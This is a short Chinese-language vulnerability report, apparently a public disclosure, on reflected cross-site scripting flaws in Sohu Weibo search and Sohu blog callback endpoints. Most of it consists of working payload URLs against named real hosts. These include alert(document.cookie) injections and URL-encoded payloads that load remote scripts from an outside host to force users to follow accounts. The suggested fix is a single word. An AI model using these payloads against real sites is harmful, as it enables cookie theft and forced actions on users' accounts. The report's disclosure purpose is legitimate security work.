1.首先是一个反射性的xss
http://t.sohu.com/twsearch/twSearch?key=asd&"><script>alert(document.cookie)</script>=1
 
这里的逻辑有点问题，导致了xss的存在，复杂点的是下面实现的可以加关注，外部引用js
 
http://t.sohu.com/twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollow.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E www.2cto.com
http://t.sohu.com/twsearch/twSearch?key=asdf&%22%3E%3Cimg%20src%3D%27ice%27%20onerror%3D%22var%20s%3Ddocument.createElement%28%27script%27%29%3Bs.src%3D%27http%3A%2f%2ficefish1987.sinaapp.com%2faddFollowajax.js%27%3Bdocument.body.appendChild%28s%29%3B%22%3E
（大致就是js form提交型以及ajax型提交，这里其实有另一个问题就是加关注应该有个token之类的来对抗反射型xss）
 
2 搜狐微博的短连接似乎有点问题
http://t.itc.cn/pQfAP
这是我生成的一个短连接，应不应该做过滤呢,要是不过滤，感觉上可能会有隐患吧
 
3. 附送几个反射性的xss，没多大意思，都是callback型的，
 
cc.i.sohu.com/a/app/counts/get.htm?ids=blog_228544023,blog_228108828,blog_228098977,blog_228095558,blog_228058235,blog_228052163,blog_227994519,blog_228005565,blog_227980500,blog_227859528,blog_227858958,blog_227825831,blog_227834137,blog_227818274,blog_227815969,blog_227813242,blog_227780666,blog_227776940,blog_227758059,blog_227757241&callback=<script>alert(document.cookie)</script>
stat.i.sohu.com/guest/frag/recents.do?callback=<script>alert(document.cookie)</script>&xpt=MTgxNzEyODE0QHFxLmNvbQ%3D%3D&_=1342946198434
 
此外感谢下：@gainover的详细教程，受益匪浅，以及px1624的js代码
 



 
 
修复方案：

过滤